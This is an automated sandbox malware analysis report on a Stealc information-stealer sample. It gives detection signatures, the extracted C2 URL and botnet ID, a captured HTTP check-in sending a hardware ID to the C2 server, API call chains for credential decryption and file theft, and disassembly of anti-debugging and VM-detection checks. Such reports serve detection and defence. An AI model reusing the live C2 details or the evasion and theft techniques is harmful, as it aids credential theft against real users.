Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1538061
MD5: ad1b355860fd1ac789fef08c2723416e
SHA1: b8c30d3b010012c818d1f104118c4f8b511dad41
SHA256: 42f5eafd03f379e54bc398fb2f502393b381aa1a58068cbcd65ae8d9f5263beb
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 2888 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AD1B355860FD1AC789FEF08C2723416E)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (network traffic)
Source: dump.pcap  Rule: JoeSecurity_Stealc_1  Description: Yara detected Stealc  Author: Joe Security

Yara matches (memory dumps)
Source: 00000000.00000003.2073382001.0000000005230000.00000004.00001000.00020000.00000000.sdmp  Rule: JoeSecurity_Stealc  Description: Yara detected Stealc  Author: Joe Security
Source: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp  Rule: JoeSecurity_Stealc  Description: Yara detected Stealc  Author: Joe Security
Source: 00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmp  Rule: JoeSecurity_Stealc  Description: Yara detected Stealc  Author: Joe Security
Source: Process Memory Space: file.exe PID: 2888  Rule: JoeSecurity_PowershellDownloadAndExecute  Description: Yara detected Powershell download and execute  Author: Joe Security
Source: Process Memory Space: file.exe PID: 2888  Rule: JoeSecurity_Stealc  Description: Yara detected Stealc  Author: Joe Security

Yara matches (unpacked PE files)
Source: 0.2.file.exe.870000.0.unpack  Rule: JoeSecurity_Stealc  Description: Yara detected Stealc  Author: Joe Security

Sigma: No Sigma rule has matched

Suricata IDS alerts
Timestamp: 2024-10-20T07:40:06.730405+0200  SID: 2044243  Severity: 1  Classtype: Malware Command and Control Activity Detected  Source IP: 192.168.2.5  Source Port: 49704  Destination IP: 185.215.113.37  Destination Port: 80  Protocol: TCP


                AV Detection

Source: file.exe  Avira: detected
Source: http://185.215.113.37/  URL Reputation: Label: malware
Source: http://185.215.113.37  URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php  URL Reputation: Label: malware
Source: 0.2.file.exe.870000.0.unpack  Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/e2b1563c6670f193.php~  Virustotal: Detection: 19%
Source: http://185.215.113.37/e2b1563c6670f193.php&  Virustotal: Detection: 16%
Source: http://185.215.113.37/l  Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpj  Virustotal: Detection: 20%
Source: Submitted Sample  Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe  Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0087C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00879AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00877240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00879B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00888EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe  Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_008838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00884910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0087DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0087E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0087ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00884570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0087F68A FindFirstFileA
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00883EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0087F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_008716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0087DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0087BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose

                Networking

Source: Network traffic  Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor  URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic  HTTP traffic detected: GET / HTTP/1.1  Host: 185.215.113.37  Connection: Keep-Alive  Cache-Control: no-cache
Source: global traffic  HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1  Content-Type: multipart/form-data; boundary=----JJKJDAEBFCBKECBGDBFC  Host: 185.215.113.37  Content-Length: 210  Connection: Keep-Alive  Cache-Control: no-cache  Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 38 36 37 45 43 30 30 41 45 41 46 32 38 31 32 36 33 31 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 2d 2d 0d 0a  Data Ascii: ------JJKJDAEBFCBKECBGDBFC  Content-Disposition: form-data; name="hwid"  D867EC00AEAF281263175  ------JJKJDAEBFCBKECBGDBFC  Content-Disposition: form-data; name="build"  doma  ------JJKJDAEBFCBKECBGDBFC--
Source: Joe Sandbox View  IP Address: 185.215.113.37
Source: Joe Sandbox View  ASN Name: WHOLESALECONNECTIONSNL
Source: unknown  TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00874880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown  HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1  Content-Type: multipart/form-data; boundary=----JJKJDAEBFCBKECBGDBFC  Host: 185.215.113.37  Content-Length: 210  Connection: Keep-Alive  Cache-Control: no-cache  Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 38 36 37 45 43 30 30 41 45 41 46 32 38 31 32 36 33 31 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 2d 2d 0d 0a  Data Ascii: ------JJKJDAEBFCBKECBGDBFC  Content-Disposition: form-data; name="hwid"  D867EC00AEAF281263175  ------JJKJDAEBFCBKECBGDBFC  Content-Disposition: form-data; name="build"  doma  ------JJKJDAEBFCBKECBGDBFC--
Source: file.exe, 00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2117561798.0000000001617000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2117561798.0000000001617000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2117561798.0000000001617000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&
Source: file.exe, 00000000.00000002.2117561798.0000000001617000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpj
Source: file.exe, 00000000.00000002.2117561798.0000000001617000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php~
Source: file.exe, 00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://185.215.113.37/l

                System Summary

Source: file.exe  Static PE information: section name: (non-printable name)
Source: file.exe  Static PE information: section name: .rsrc
Source: file.exe  Static PE information: section name: .idata
Source: file.exe  Static PE information: section name: (non-printable name)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AEF088
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00CC28FF
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C4406C
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C31807
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C40AA4
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00BD7A7D
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00B1627F
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00BF3B85
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00B00BF2
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C38323
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C2E424
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00B67C47
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C2FDCB
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00BD6DF5
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00BAED38
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C3BD76
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C34E9B
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00B656D1
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C39E6F
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00D55FA8
Source: C:\Users\user\Desktop\file.exe  Code function: String function: 008745C0 appears 316 times
Source: file.exe  Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe  Static PE information: Section: qmfnotwd ZLIB complexity 0.9949935645063598
Source: file.exe  Static PE information: Entry point disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5, instruction diversity: 0.5
Source: file.exe, 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2073382001.0000000005230000.00000004.00001000.00020000.00000000.sdmp  Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine  Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00888680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00883720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe  File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\AFE25WAF.htm
Source: C:\Users\user\Desktop\file.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe  String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe  Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe  Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe  Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe  Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe  Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe  Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe  Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe  Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe  Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe  Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe  Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe  Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe  Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe  Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe  Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe  Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe  Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe  Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe  Static file information: File size 1846784 > 1048576
Source: file.exe  Static PE information: Raw size of qmfnotwd is bigger than: 0x100000 < 0x19cc00

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe  Unpacked PE file: 0.2.file.exe.870000.0.unpack :EW;.rsrc :W;.idata :W; :EW;qmfnotwd:EW;bvdxcoxs:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;qmfnotwd:EW;bvdxcoxs:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00889860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample  Static PE information: section where entry point is pointing to: .taggant
Source: file.exe  Static PE information: real checksum: 0x1cd797 should be: 0x1cbefb
Source: file.exe  Static PE information: section name: (non-printable name)
Source: file.exe  Static PE information: section name: .rsrc
Source: file.exe  Static PE information: section name: .idata
Source: file.exe  Static PE information: section name: (non-printable name)
Source: file.exe  Static PE information: section name: qmfnotwd
Source: file.exe  Static PE information: section name: bvdxcoxs
Source: file.exe  Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00D160DA push esi; mov dword ptr [esp], 348A9A21h  at 0_2_00D1619A
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00CDA8C0 push ebp; mov dword ptr [esp], ebx  at 0_2_00CDA8CA
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AEF088 push 1116EA05h; mov dword ptr [esp], eax  at 0_2_00AEF0B8
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AEF088 push ecx; mov dword ptr [esp], eax  at 0_2_00AEF101
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AEF088 push esi; mov dword ptr [esp], ebx  at 0_2_00AEF11E
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00CC28FF push 40E986EAh; mov dword ptr [esp], eax  at 0_2_00CC29A9
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00D14884 push edi; mov dword ptr [esp], esi  at 0_2_00D148C0
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00D14884 push edx; mov dword ptr [esp], eax  at 0_2_00D148FC
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00D14884 push edx; mov dword ptr [esp], 59892145h  at 0_2_00D1490E
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00D14884 push 1CEB38AEh; mov dword ptr [esp], eax  at 0_2_00D149A8
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AD88C5 push ecx; mov dword ptr [esp], 7BEA3018h  at 0_2_00AD8C13
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00CB20B9 push 6C2E2848h; mov dword ptr [esp], ecx  at 0_2_00CB20C1
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C56066 push esi; mov dword ptr [esp], eax  at 0_2_00C56494
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C56066 push ebp; mov dword ptr [esp], 0D2EE97Eh  at 0_2_00C56899
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C56066 push eax; mov dword ptr [esp], 457280B0h  at 0_2_00C568A4
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C56066 push ecx; mov dword ptr [esp], 2F61F942h  at 0_2_00C568AF
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C4406C push 2DE1A301h; mov dword ptr [esp], ebp  at 0_2_00C44087
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C4406C push eax; mov dword ptr [esp], esi  at 0_2_00C4408B
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C4406C push esi; mov dword ptr [esp], 72786533h  at 0_2_00C440EE
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C4406C push 4D660B35h; mov dword ptr [esp], edi  at 0_2_00C44142
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C4406C push 7419BFA9h; mov dword ptr [esp], ebp  at 0_2_00C44157
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C4406C push 32D12C99h; mov dword ptr [esp], edi  at 0_2_00C44389
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C4406C push 19B0A8E0h; mov dword ptr [esp], ebp  at 0_2_00C44497
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C4406C push 332E7277h; mov dword ptr [esp], ebp  at 0_2_00C444A4
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C4406C push ebx; mov dword ptr [esp], ecx  at 0_2_00C4453A
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C4406C push edx; mov dword ptr [esp], eax  at 0_2_00C4453E
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C4406C push 57501884h; mov dword ptr [esp], edx  at 0_2_00C4459B
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C4406C push 438ECED9h; mov dword ptr [esp], ecx  at 0_2_00C445AB
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C4406C push esi; mov dword ptr [esp], eax  at 0_2_00C44632
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C4406C push esi; mov dword ptr [esp], ebx  at 0_2_00C44697
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00C4406C push eax; mov dword ptr [esp], esi  at 0_2_00C446C1
Source: file.exe  Static PE information: section name: qmfnotwd entropy: 7.953945835356761

                Boot Survival

Source: C:\Users\user\Desktop\file.exe  Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe  Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe  Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe  Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe  Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00889860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe  Evasive API call chain: GetUserDefaultLangID, ExitProcess  graph_0-13414
Source: C:\Users\user\Desktop\file.exe  File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe  File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: AD225F second address: AD2263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: AD2263 second address: AD1B83 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a or dword ptr [ebp+122D3020h], ecx 0x00000010 push dword ptr [ebp+122D0A8Dh] 0x00000016 jnp 00007F996107E1C5h 0x0000001c jmp 00007F996107E1BFh 0x00000021 call dword ptr [ebp+122D187Dh] 0x00000027 pushad 0x00000028 or dword ptr [ebp+122D25BFh], esi 0x0000002e xor dword ptr [ebp+122D25BFh], ebx 0x00000034 xor eax, eax 0x00000036 jmp 00007F996107E1BDh 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f stc 0x00000040 mov dword ptr [ebp+122D2B2Fh], eax 0x00000046 sub dword ptr [ebp+122D1C2Ch], ebx 0x0000004c add dword ptr [ebp+122D3020h], edx 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D25BFh], esi 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 jmp 00007F996107E1BCh 0x00000066 lodsw 0x00000068 cld 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d je 00007F996107E1B7h 0x00000073 clc 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 clc 0x00000079 push eax 0x0000007a pushad 0x0000007b pushad 0x0000007c jmp 00007F996107E1C7h 0x00000081 jp 00007F996107E1B6h 0x00000087 popad 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: C492E2 second address: C492E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: C492E6 second address: C492EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: C405BD second address: C405CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 jns 00007F99607DC0C6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: C4893A second address: C4896D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F996107E1C1h 0x00000009 jmp 00007F996107E1C5h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F996107E1B6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: C4896D second address: C48982 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0CFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: C48982 second address: C4898C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F996107E1BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: C48B4A second address: C48B50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: C48B50 second address: C48B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F996107E1C9h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
